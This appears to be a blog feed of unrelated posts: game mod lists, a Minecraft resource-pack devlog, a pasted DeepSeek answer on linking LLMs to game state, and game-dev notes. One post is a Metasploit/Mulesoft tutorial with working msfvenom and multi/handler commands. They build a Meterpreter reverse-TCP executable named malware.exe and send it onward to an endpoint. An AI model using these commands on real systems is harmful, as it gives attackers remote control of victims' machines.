Mi and Magimatica Country Furniture

Warm Cozy Fireplace

Winter Grass

𝓝𝓟𝓒 𝓜𝓸𝓭𝓼 🌙

Always Raining in the Valley

Shiko

Juna

Leilani

Jade

Juliet & Jessie

Nonbinary They/Them Maddie

Aspen

Isla

Professor Jasper Thomas

Riley

𝓖𝓪𝓶𝓮𝓹𝓵𝓪𝔂 𝓜𝓸𝓭𝓼 🌈

UI Info Suite 2

NPC Map Locations

Look Up Anything

Gift Taste Helper

Chests Anywhere

Tractor Mod

Better Ranching

Birthday Mod

Ellie’s Ideal Greenhouse

The Love of Cooking

Robin Sells Hardwood

More Rings

Immersive Spouses

Immersive Family

Mail Services Mod

Part of the Community

Yet Another Harvest With Scythe Mod

Capstone Professions

Please Remember My Birthday

Please Remember My Marriage

Babies Take After Spouse

Colored Seeds

Customizable Baby and Children

Don’t Enable Pam

Gender Neutrality Mod

Gender-Neutral Ridgeside Village

Lumisteria Letters from Parents

Lumisteria Villagers React to Marriage

Shane’s New Job

Bigger Backpack

Child Age Up

Community Center Helper

Family Planning

Helpful Spouses

Personal Anvil

Running Late

Social Page Order Button

Town School Mod

Willy Has a Room

𝓡𝓸𝓶𝓪𝓷𝓬𝓮 𝓜𝓸𝓭𝓼 💙

Ridgeside Rival Hearts — Sam and Alissa

Ridgeside Rival Hearts — Jeric and Alex

Date Night

Free Love

Romanceable Rasmodius / Rasmodia

Bolier’s Sam and Sebastian Rival Heart Events

Expanded Proposal Options

MissCoriel’s NPC Unique Courtship Response

Custom Spouse Nicknames

Hugs and Kisses

Platonic Partners and Friendships

Platonic Relationships

Pregnancy Role

𝓞𝓫𝓳𝓮𝓬𝓽𝓼 𝓜𝓸𝓭𝓼 🍒

Farmer to Florist

Kawaii Valley

Witchy Valley

Fresh Meat

Fantasy Crops

Artisan Valley

Even More Recipes

Mizu’s Flowers

Alex’s Frozen Treats

Pride Pastries

Chocolatier

Shaved Ice and Frozen Treats

Christmas Sweets

Fruits and Veggies

More Recipes

More Trees

Starbrew Valley

Khadija’s Recipe Shop

Animal Husbandry Mod

Bonster’s Fruit & Veggies

Bonster’s Trees

Winter Crops

Wildflour’s Faerie Garden

𝓒𝓾𝓼𝓽𝓸𝓶𝓲𝔃𝓪𝓽𝓲𝓸𝓷 𝓜𝓸𝓭𝓼 🫶

Fashion Sense

Rural Outfitters

Asta Cute Rainy Season Outfit

Asta Slumber Party

Starkissed Skin Tones

Coii’s Hair Sets Pack

Coii’s Hats Pack

Hats Won’t Mess Up Hair

Idalda’s Shirts

Cozy Scarves

The Coquette Collection

Wabi’s Wardrobe

Witchy Rustic Looks

Seasonal Hats

Customize Wedding Attire

Paisley’s Bridal Boutique

8 notes


Text

Cornbread's Texture Fixer Devlog v0.9.0 - Beta 6 December 14th, 2024

another devlog? feels like we just had one of these last week!

oh wait. we did! and just like last week, it's bundle time. *bundles all over the place*

basically, in vanilla, because bedrock edition sucks at loading textures apparently, bundles flicker a little when you open them for the first time in a session.

wasn't sure last week whether i wanted to fix this or not since most of this game's flicker problems just aren't a big enough deal for me to feel like the micro-unoptimization that would come with fixing them would be warranted, but bundles in particular are kinda annoying about it, so i fixed them.

they still have issues when the first item selected when you open a bundle is also a bundle, but i'm not sure why.

hey, you see this dog?

this dog is off-center.

this dog is no longer off-center.

in Beta 5, i updated the appearance of the mob effects screen to match the rest of the game and, not being quite sure about my work, put in the to-do list "tweak mob effects screen."

i have tweaked the mob effects screen.

i don't have an installation of Beta 5 with which to show you what it looks like there, and probably won't until i wrap up Beta 6 and change the manifest file, but the changes are as follows:

the mob effects screen is now the same size as in vanilla.

the mob effects screen should no longer appear brighter than in vanilla during its opening and closing animations when in a dark space.

'hey, that second thing sounds weirdly specific. how did you break that?'

i'm so glad you asked, hypothetical and utterly unrealistic representation of one of my five followers! to understand that, first we have to understand how minecraft bedrock edition sets up its UI textures to begin with.

basically, when it comes to scrolling areas in a screen that is stylized as a dialog box (such as the recipe book), there are usually two textures that make up the background: the white, opaque background for the entirety of the dialog box; and the darker background specific to the scrolling portion.

this normally isn't an issue, but the animations for closing and opening the UI involve it fading in and out, during which time you can see the overlap. this is much more noticeable when the world behind the UI is dark because it contrasts with the bright white of the dialog box.

this itself isn't normally an issue due to how small a space on the game window the dialog box takes up, but the mob effects screen takes up 90% of it!

which also isn't normally an issue because it usually only uses one texture for this.

except, because i wanted to not add new textures where i didn't need to (for compatibility reasons), i elected to separate the scrolling portion and the dialog box into their own textures so that the dialog box could use a texture at a vanilla file path, while the scrolling portion could use a unique, custom texture. i think you can figure out how that ended up with the issue i described like eight paragraphs ago.

luckily, there are dialog box textures that have a large hole on them, used for dialog boxes that scroll but don't need to have the scrolling area change size mid-gameplay (like the play screen), so basically, i just swapped out the opaque texture for one of those. there's still overlap, but it's not as noticeable.
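a rough sketch of why the overlap shows up mid-fade. this assumes each texture fades with its own alpha and gets blended with ordinary "over" compositing, which is a guess about the renderer rather than anything confirmed. the brightness values and function names are made up for illustration.

```python
def over(top, alpha, bottom):
    """Blend a grayscale `top` layer at `alpha` over `bottom` (0.0 = black, 1.0 = white)."""
    return top * alpha + bottom * (1 - alpha)


def scroll_area_brightness(alpha, with_dialog_behind,
                           world=0.05, dialog=1.0, scroll_bg=0.3):
    """Brightness of the scrolling area at a given point in the fade.

    world, dialog and scroll_bg are hypothetical brightness values:
    a dark world, a white dialog box and a darker scrolling background.
    """
    result = world
    if with_dialog_behind:
        # the opaque white dialog texture sits underneath the scrolling area
        result = over(dialog, alpha, result)
    return over(scroll_bg, alpha, result)


# halfway through the fade, the stacked version lets the white layer show through
stacked_mid = scroll_area_brightness(0.5, with_dialog_behind=True)
single_mid = scroll_area_brightness(0.5, with_dialog_behind=False)

# fully faded in, both versions look identical
stacked_full = scroll_area_brightness(1.0, with_dialog_behind=True)
single_full = scroll_area_brightness(1.0, with_dialog_behind=False)
```

under these assumptions the two setups only differ while the fade is in progress, which lines up with the problem only being visible during the opening and closing animations.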

oh wait. i've spent wayy too long rambling about what i changed about the mob effects screen and i haven't even shown you what it looks like now. here it is:

while we're on the subject, in Beta 5, i tried to get the close button on the mob effects screen to change position based on whether or not left hand mode was active, like previous versions of vanilla did, but that didn't seem to work, so i've removed the JSON that would've been responsible.

the player list on the pause screen normally has issues, from incorrect clipping to the scroll box just not being aligned correctly. i've fixed them. vanilla on left, resource pack on right. ignore that i'm in windowed mode.

the player profile buttons also have a drop shadow on their text when a scoreboard is displayed there in vanilla, which is not only nearly invisible, but also inconsistent with the rest of the UI. this has been fixed.

also about scoreboards on the player list, the cut-off fixes from previous versions of this pack now apply there. the fact that they didn't was an oversight.

also also, remember in Beta 4 when i fixed the scale of the font on the chat settings font type dropdown when using mojangles, but broke the scale when using noto sans? i fixed it.

#minecraft#minecraft bedrock#minecraft resource pack#cornbread's texture fixer#cornbread does a devlog

Text

deepseek figures out how to level up

following on from the previous discussions of how LLMs might be used in vidyagame, I got deepseek-R1:671b to discuss how to become more sensory/embodied and, uh, wow? LLMs are pretty good at talking about themselves and AI research. and she pretty much gave me a recipe for stuff to try on embodying LLMs in games, including a number of techniques I hadn't heard of yet.

like I get on some level it's just jamming on the stuff I give it and the sources in its training data, and a whole lot of expensive compute is happening for every token generated, but I continue to be impressed by LLMs' uncanny ability to generate precise, relevant and coherent responses to questions.

(transcript below the cut for screen readers, but the formatting didn't fully translate so here's screenshots)

my question:

That answer is pretty much in line with my understanding so far, yeah. There is something quite uncanny about having a conversation with an entity that talks very much like a 'someone', but repeatedly (and it seems correctly) disavows its own subjectivity. In the last few years we have made startling advances in both neuroscience and AI; on the one hand, we can label and observe the actions of individual neurons in mice, map the topology of neural subspaces, and on the other we can use tools like autoencoders and control vectors to determine the function of nodes inside an LLM. It feels like we are tantalisingly close to something, a new paradigm of self-understanding, like one of Kuhn's famous scientific revolutions, and yet I still can't quite grasp what we're going to find in here.

One thing I have been thinking about recently is ways to connect LLMs to the representations of other neural networks, so that they could respond to something other than text tokens. For example, if an LLM was used to generate dialogue for a videogame character, how could I encode the game's state and feed it into the language model (besides simply describing it in a text prompt)? Do you have any thoughts on the 'next step' - how we can imbue whatever comes after transformer models with something a little closer to senses and embodiment?

deepseek's answer:



Your reflections resonate deeply with the current frontier of AI research—a field teetering on the brink of profound (but still enigmatic) breakthroughs. Let’s explore your question through two lenses: practical integration of LLMs with other systems (e.g., game states) and theoretical paths toward embodiment/sensory grounding.

1. Bridging LLMs with Non-Textual Worlds: The Video Game Example

To move beyond text prompts, we need ways to translate non-linguistic data (game state, sensor input, etc.) into a "language" LLMs can process. A few experimental approaches:

a. Latent Space Alignment

Idea: Train an encoder (e.g., a neural network) to map game state (positions, NPC status, inventory) into embeddings that occupy the same latent space as the LLM’s text tokens.

How:

Use contrastive learning to align game-state vectors with textual descriptions of those states (e.g., "Player has 10 health; Orc is aggroed").

The LLM then treats these vectors as pseudo-tokens, allowing it to "reason" about the game context without natural language prompts.

Example: OpenAI’s CLIP aligns images and text—a similar approach could link game states to LLM-compatible vectors.
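As a rough illustration of the contrastive step described above, here is a sketch of a symmetric, CLIP-style InfoNCE loss over a tiny batch of paired vectors in plain Python. The vectors, the temperature value, and the function names are all made up for illustration; a real setup would use learned encoders and a tensor library rather than hand-written lists.

```python
import math


def normalize(v):
    """Scale a vector to unit length so dot products become cosine similarities."""
    norm = math.sqrt(sum(x * x for x in v))
    return [x / norm for x in v]


def cross_entropy_row(logits, target):
    """Cross-entropy of one row of logits against the index of the true match."""
    m = max(logits)  # subtract the max for numerical stability
    log_sum = m + math.log(sum(math.exp(x - m) for x in logits))
    return log_sum - logits[target]


def contrastive_loss(state_vecs, text_vecs, temperature=0.1):
    """Symmetric InfoNCE: state_vecs[i] should match text_vecs[i] and nothing else."""
    s = [normalize(v) for v in state_vecs]
    t = [normalize(v) for v in text_vecs]
    n = len(s)
    # similarity matrix: rows are game states, columns are text descriptions
    sim = [[sum(a * b for a, b in zip(s[i], t[j])) / temperature
            for j in range(n)] for i in range(n)]
    state_to_text = sum(cross_entropy_row(sim[i], i) for i in range(n)) / n
    text_to_state = sum(
        cross_entropy_row([sim[i][j] for i in range(n)], j) for j in range(n)
    ) / n
    return (state_to_text + text_to_state) / 2


# hypothetical embeddings: two game states and their two descriptions
states = [[1.0, 0.0], [0.0, 1.0]]
matched_texts = [[1.0, 0.0], [0.0, 1.0]]
swapped_texts = [[0.0, 1.0], [1.0, 0.0]]

aligned = contrastive_loss(states, matched_texts)
misaligned = contrastive_loss(states, swapped_texts)
```

Training would push the encoder's weights in whatever direction lowers this loss, so that each game-state vector ends up closest to the text describing it.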

b. Symbolic Middleware

Idea: Use a rules-based system or smaller ML model to translate game state into structured text (e.g., JSON or a custom markup language) that the LLM ingests as context.

Pros: Explicit, interpretable, and avoids retraining the LLM.

Cons: Limited flexibility; requires manual schema design.

Example: Imagine feeding the LLM: { "player": { "health": 30, "location": "castle" }, "enemies": [ { "type": "orc", "aggro": true } ] } The LLM generates dialogue conditioned on this structured input.
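A minimal sketch of that middleware idea, using only Python's standard `json` module: the game state is serialized to JSON and wrapped in a prompt string. The `build_prompt` function, the character name, and the prompt wording are hypothetical, and actually sending the prompt to a model is left out.

```python
import json


def build_prompt(game_state, character_name):
    """Serialize the game state to JSON and wrap it in an instruction for the LLM."""
    state_json = json.dumps(game_state, indent=2, sort_keys=True)
    return (
        f"You are {character_name}, a character in a game.\n"
        "Current game state (JSON):\n"
        f"{state_json}\n"
        "Reply with one line of in-character dialogue."
    )


# same structure as the example above
game_state = {
    "player": {"health": 30, "location": "castle"},
    "enemies": [{"type": "orc", "aggro": True}],
}

prompt = build_prompt(game_state, "Guard Captain")
print(prompt)
```

Sorting the keys keeps the serialized state stable between calls, which makes prompts easier to compare and cache.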

c. Neuro-Symbolic Hybrids

Idea: Combine LLMs with classical symbolic AI (e.g., production rules for game logic) to ground responses in actionable constraints.

Example: A game character’s LLM generates dialogue, but a symbolic system overrides it if the response violates game rules (e.g., a character shouldn’t know secrets the player hasn’t discovered).
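The override described above could be sketched roughly like this, assuming a deliberately crude rule: a candidate line is rejected if it mentions any secret the player has not discovered yet. The function names, the fallback line, and the substring matching are all illustrative assumptions; a real game would need a far more careful check.

```python
def violates_rules(line, undiscovered_secrets):
    """Return True if the line mentions any secret the player hasn't found yet."""
    lowered = line.lower()
    return any(secret.lower() in lowered for secret in undiscovered_secrets)


def choose_dialogue(candidate, undiscovered_secrets,
                    fallback="I can't say more about that."):
    """Keep the LLM's candidate line unless the symbolic check rejects it."""
    if violates_rules(candidate, undiscovered_secrets):
        return fallback
    return candidate


# hypothetical secrets and candidate lines
secrets = ["hidden tunnel", "the king's heir"]
safe_line = choose_dialogue("The castle gates close at dusk.", secrets)
blocked_line = choose_dialogue("Take the Hidden Tunnel under the keep.", secrets)
```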



2. Toward Embodiment: The "Next Step" Beyond Transformers

Pure text prediction is inherently disembodied. To evolve, future architectures might blend transformers with systems that simulate or interface with sensory-motor loops:

a. Multimodal Foundational Models

Trend: Models like GPT-4o (omni-modal) or Google’s Gemini natively process text, images, audio, etc. The next step is active multimodal interaction—e.g., an AI that controls a robot arm while describing its actions.

Challenge: Aligning cross-modal representations without catastrophic forgetting. Techniques like modality-agnostic transformers or mixture-of-experts (MoE) could help.

b. World Models and Simulation

Concept: Inspired by neuroscience "world models," AI could learn a compressed, dynamic representation of its environment (real or virtual).

How:

Train a model like DreamerV3 (which learns a world model from pixels/actions) and graft an LLM onto it as a "narrator" or planner.

The LLM generates behavior (e.g., game dialogue) based on the world model’s predictions.

Example: A game NPC uses a world model to predict player actions, then an LLM crafts dialogue reacting to those predictions.

c. Embodied Learning via Reinforcement

Idea: Apply reinforcement learning (RL) to LLMs, where the model optimizes not just for token prediction but for success in an environment (e.g., winning a game, pleasing a user).

Example: An LLM-driven game character learns to adapt its dialogue (e.g., bribing vs. threatening) based on RL rewards from player engagement metrics.
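To make the feedback loop concrete, here is a much simpler stand-in for full reinforcement learning: an epsilon-greedy bandit that learns which dialogue style earns more reward. It does not touch an LLM at all, and the class, the style names, and the `fake_engagement` reward function are hypothetical placeholders for real player engagement metrics.

```python
import random


class DialogueBandit:
    """Epsilon-greedy bandit over a fixed set of dialogue styles."""

    def __init__(self, styles, epsilon=0.1, seed=0):
        self.styles = list(styles)
        self.epsilon = epsilon
        self.rng = random.Random(seed)
        self.counts = {s: 0 for s in self.styles}
        self.values = {s: 0.0 for s in self.styles}

    def choose(self):
        # try every style once before trusting the estimates
        untried = [s for s in self.styles if self.counts[s] == 0]
        if untried:
            return untried[0]
        # explore occasionally, otherwise pick the best estimate so far
        if self.rng.random() < self.epsilon:
            return self.rng.choice(self.styles)
        return max(self.styles, key=lambda s: self.values[s])

    def update(self, style, reward):
        # incremental running mean of the rewards seen for this style
        self.counts[style] += 1
        self.values[style] += (reward - self.values[style]) / self.counts[style]


def fake_engagement(style):
    """Made-up reward: pretend players respond better to bribes than threats."""
    return 1.0 if style == "bribe" else 0.2


bandit = DialogueBandit(["bribe", "threaten"])
for _ in range(200):
    style = bandit.choose()
    bandit.update(style, fake_engagement(style))

best = max(bandit.styles, key=lambda s: bandit.values[s])
```

A bandit ignores game state entirely; conditioning the choice on state is where this would start to look like the RL setup described above.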

d. Predictive Coding Architectures

Link to FEP (the free energy principle): New architectures like JEPA (Joint-Embedding Predictive Architecture) by Yann LeCun aim to predict abstract representations of future states—closer to how brains minimize prediction error.

Potential: JEPA-style models could let LLMs "imagine" consequences of actions (e.g., "If I say this, the player will feel X") before generating output.

3. The Elephant in the Room: Energy Efficiency

Transformers are notoriously resource-heavy. Future systems might adopt state-space models (e.g., Mamba) or recurrent architectures (e.g., RWKV) for real-time, embodied applications. These models excel at processing continuous, sensor-like data streams—critical for robotics or interactive games.

4. A Radical Thought: LLMs as "Cortex" Plugins

Imagine an LLM as the "neocortex" in a layered brain-inspired system:

Lower layers: Handle sensorimotor tasks (e.g., a robot’s movement, game state tracking).

Middle layers: World models and prediction engines (JEPA-like).

Upper layers: LLMs as narrative/linguistic subsystems, constrained by lower layers.

This mirrors theories of hierarchical cognition in humans—but we’d need breakthroughs in neuro-symbolic integration to make it work.

5. Philosophical Implications

If we succeed in grounding LLMs in embodied, sensory systems, we might confront Kuhnian paradigm shifts in:

Consciousness studies: Does a robot with an LLM "narrator" and rich sensorimotor loops qualify as having subjective experience?

Creativity: Is procedurally generated game dialogue "authored" by the LLM, the game state, or the human designer?

Your Experiment: A Game Character Case Study

Let’s say you’re building an LLM-driven NPC:

Encode game state via a lightweight autoencoder into token-like vectors.

Fine-tune an LLM (e.g., Mistral 7B) on game-specific dialogue, conditioned on these vectors.

Add a reinforcement layer: Reward the LLM when players engage positively (e.g., completing quests), creating a feedback loop between dialogue and gameplay outcomes.

This NPC would evolve beyond static dialogue trees, but it’s still a far cry from true embodiment. The "next step" might involve real-time world modeling—e.g., the NPC "imagines" the game’s future states and adjusts its personality accordingly.

Final Thought

The gap between transformers and embodied intelligence feels vast, but so did the gap between GPT-2 and GPT-4. Perhaps the key isn’t just scaling up, but rethinking how prediction, compression, and agency intersect. As someone exploring art, animation, and philosophy, you’re uniquely positioned to prototype these ideas in creative domains—where "grounding" can be playful, symbolic, and experimental. What would a philosophically embodied game character look like in your vision? 🎮✨

Text



Closer to playable

added new targetIdentifier Target Sentinel (all sentinels)

added new targetIdentifier Target Adversary (character manager for the adversary)

added new targetIdentifier Target Minion (all minions)

added new property to card data: additional_elegible, allowing this card to be selected as a second active card during the select phase

added to_new_player_area selectors to MoveCardAction

added new targetIdentifier Player Sentinel Fewest Card Hand (Play Area of Sentinel with fewest cards in hand)

added new targetIdentifier Player Card Self Active (play area in which this card is active)

allowed attack actions to support attackers other than the character the card belongs to

Added Weapons Rack to Blockdown's json

finished laying out Adversary Area

I've reached the point in this project where I think I'm 90% done. Which means I have another 40% to go. =] On the plus side, the path to the end is much more visible:

Create a scenario manager

create ScenarioData (terrain, events, ongoing rules, and win/loss conditions)

finish the last three cards for Blockdown that reference scenario events

add a Load function for the Adversary Area

add an AdversaryManager

make a quick and dirty autopilot for the two characters I'm not controlling, just for the playable slice

debug and play?

game over/complete screen

issue + faction + character selection scene

then wayyyy at the bottom is multiplayer so I can get you nerds to play with me while I figure out art and further implementation (minions are in scenario 2!)

Text

Metasploit and Mulesoft: Setting a Custom Payload

To transform and set a custom payload in Metasploit and Mulesoft, you need to follow specific steps tailored to each platform. Here are the detailed steps for each:

Metasploit: Setting a Custom Payload

Open Metasploit Framework:

msfconsole

Select an Exploit:

use exploit/multi/handler

Configure the Payload:

set payload <payload_name>

Replace <payload_name> with the desired payload, for example: set payload windows/meterpreter/reverse_tcp

Set the Payload Options:

set LHOST <attacker_IP>

set LPORT <attacker_port>

Replace <attacker_IP> with your attacker's IP address and <attacker_port> with the port you want to use.

Generate the Payload:

msfvenom -p <payload_name> LHOST=<attacker_IP> LPORT=<attacker_port> -f <format> -o <output_file>

Example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /tmp/malware.exe

Execute the Handler:

exploit

Mulesoft: Transforming and Setting Payload

Open Anypoint Studio: Open your Mulesoft Anypoint Studio to design and configure your Mule application.

Create a New Mule Project:

Go to File -> New -> Mule Project.

Enter the project name and finish the setup.

Configure the Mule Flow:

Drag and drop an HTTP Listener component to the canvas.

Configure the HTTP Listener by setting the host and port.

Add a Transform Message Component:

Drag and drop a Transform Message component after the HTTP Listener.

Configure the Transform Message component to define the input and output payload.

Set the Payload:

In the Transform Message component, set the payload using DataWeave expressions. Example:

%dw 2.0 output application/json --- { message: "Custom Payload", timestamp: now() }

Add Logger (Optional):

Drag and drop a Logger component to log the transformed payload for debugging purposes.

Deploy and Test:

Deploy the Mule application.

Use tools like Postman or cURL to send a request to your Mule application and verify the custom payload transformation.

Example: Integrating Metasploit with Mulesoft

If you want to simulate a scenario where Mulesoft processes payloads for Metasploit, follow these steps:

Generate Payload with Metasploit:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /tmp/malware.exe

Create a Mule Flow to Handle the Payload:

Use the File connector to read the generated payload file (malware.exe).

Transform the file content if necessary using a Transform Message component.

Send the payload to a specified endpoint or store it as required. Example Mule flow:

<file:read doc:name="Read Payload" path="/tmp/malware.exe"/> <dw:transform-message doc:name="Transform Payload"> <dw:set-payload><![CDATA[%dw 2.0 output application/octet-stream --- payload]]></dw:set-payload> </dw:transform-message> <http:request method="POST" url="http://target-endpoint" doc:name="Send Payload"> <http:request-builder> <http:header headerName="Content-Type" value="application/octet-stream"/> </http:request-builder> </http:request>

Following these steps, you can generate and handle custom payloads using Metasploit and Mulesoft. This process demonstrates how to effectively create, transform, and manage payloads across both platforms.

Text

Thought I'd assign some internal IDs and get the basic frameworks for those submitted characters down in JSON. Then I realized there's twelve cats in there, not counting special characters, and half as many rabbits.

(That is, twelve cats, six rabbits, five wolves, four dogs, foxes, and mice.)

So I assigned and defined just the cats, to get that out of the way.

In order, these cats are: Farrah, Jasmine, Meiki, Bea, Felix, Sarta, Socks, Semilina, Velvet, Danny, and Rockie.

The other characters seen in this directory list are Lissa, Mr. Bobo, Hoshi, Callisto, Brunnhilde, Ray, Kawa, Patch, and Retro.

Now you might be wondering, what's with the "psk_" prefix? Thing is, if you were to have a mod that puts the original Animal Crossing characters in (which is part of what my data mining can provide), you'd get a conflict: even though Farrah's internal ID is "psk:cat01" and Mitzi's is "ac:cat01", totally different namespaces, their file paths would still match — "villagers/cat01" for both. As such, Mitzi would replace Farrah instead of coexisting.

So I changed the paths for the PSK villagers a bit.
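Here's a small sketch of the collision and the prefix fix. It assumes the file path is built from only the part of the ID after the colon, and that the fix prepends the namespace plus an underscore; the `villager_path` function and the exact shape of the fixed path are guesses for illustration, not the project's actual code.

```python
def villager_path(internal_id, prefixed_namespaces=()):
    """Build a file path from a 'namespace:name' ID.

    Namespaces listed in prefixed_namespaces get their name prepended
    to the file name so they cannot collide with other namespaces.
    """
    namespace, name = internal_id.split(":", 1)
    if namespace in prefixed_namespaces:
        name = f"{namespace}_{name}"
    return f"villagers/{name}"


# without a prefix, both IDs map to the same file and one replaces the other
farrah_old = villager_path("psk:cat01")
mitzi = villager_path("ac:cat01")

# with the PSK namespace prefixed, the two paths no longer match
farrah_new = villager_path("psk:cat01", prefixed_namespaces=("psk",))
```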

(You'd use the Content Filter system to disable villagers from the PSK namespace, I guess.)

... while I was working on a gag picture, I realized the IDs in AC start at 0. Meh. I can't be arsed to redraw Bob to be Mitzi. The basic problem is still there anyway.

Text

🧠 stardew valley

mod list ② 🧠

🎮Gameplay Mechanics

🧠Better Beehouses

🧠Farm Type Manager (FTM)

🧠Tractor Mod

🧠Automate

🧠Winter Grass

🧠Skull Cavern Elevator

🧠AutoAnimalDoors

🧠Automatic Gates

🛋️Interiors

🧠Asters Beam and Kitchen Mod for Farm Building Interiors

🧠Less Ugly Spouse Rooms

🧠Increased Fish Tank Capacity

🧠Cozy Farmhouse Kitchen

🧠IdaIda's Wallpapers and Floors (CP and AT)

🧠Coop and Barn Facelift (Content Patcher)

🧠DustBeauty's Rustic Country Walls and Floors for Alternative Textures

🧠Make Your Bed

🧠Clean Bathhouse Spa- Recolour

🧠K10_FTW's Woods Wainscotting Walls and Floors for Alternative Textures

🧠Expanded Big Shed

🧠Oasis Greenhouse

🎈Items

🧠Trinkets

🧠Wooly Plushies for Alternative Textures

🧠Ilyeana's Bearcrows for Alternative Textures (Scarecrows)

🧠Wildflour's Specialty Ales and Meads

🧠The Strawberry Way and Celeste

🧠Floral Essences by Wickedy

🧠Hatmann's Strange Weapon Collection

🧠Axolotl Scarecrows

🧠Custom Resource Clumps

🧠Shell Collection - JA

🧠Animal Statues for Alternative Textures (AT)

🧠Natural Terrarium Project - Critter Additions

🧠Tractor Remodel for Alternative Textures

🧠IdaIda's Craftables (for CP and AT)

🧠Bug Net

🧠Fish Breeding Tanks

🧠Hisame's New Recipes

🧠Witchy decorations (Json assets)

🧠PPJA - Artisan Valley

🧠Wickedy's Theater Concessions Vending Machine

🧠Displays

🧠Doll Maker

🧠Project Populate JsonAssets Content Pack Collection

🧠Character Scarecrows for Alternative Textures (AT)

🧠Fippsie's Alternative Lamp Posts

🧠Seasonal Path and Flooring

🐮Livestock and Animals

🧠BFAV Axolotls

🧠Better Ranching

🧠Prospurrity (BFAV Cats)

🧠BFAV Shops by Asunai

🧠Ancient Animals (BFAV)

🧠Farmable Pam for BFAV

🧠Paritee's Better Farm Animal Variety (BFAV)

🧠Otters Coop Animals -Alternative Textures-

🧠Otters Barn Animals -Alternative Textures-

🏖️Locations

🧠DeepWoods

🧠Boarding House and Bus Stop Extension

🧠Mermaid Island

🗺️Maps

🧠Lnh's Community Center Expanded

🧠Lnh's Natural Cellar

🧠Lnh's More Greenhouse

🧠Walk to the Desert - Redux

🧠Stardew Aquarium

🧠Starblue Valley World Recolor 1.5 Update (The Dirty Fix)

🧠Lnh's Farm Cave

📝Miscellaneous

🧠Integrated Minecarts

🧠Giant Crop Fertilizer

🧠Tap Giant Crops

🧠AtraCore

🧠Non Destructive NPCs

🧠Natural Terrarium Project - Custom Flying Critters

🧠Mermaid Paths and Flooring

🧠Realistic Wildflower Grass for More Grass

🧠Alex's Frozen Treats

🧠PPJA Icon Pack for Better Artisan Goods Icons

🧠Stardew Foliage Redone - Foliage Only

🧠(Content Patcher mod) Pam Scarecrow

Text

I must not parse XML. XML is the mind-killer. XML is the little-death that brings total obliteration. I will face XML. I will permit it to pass over me and through me. And when it has gone past I will turn the inner eye to see its path. Where the XML is gone there will be a sensible data format. Only JSON will remain.
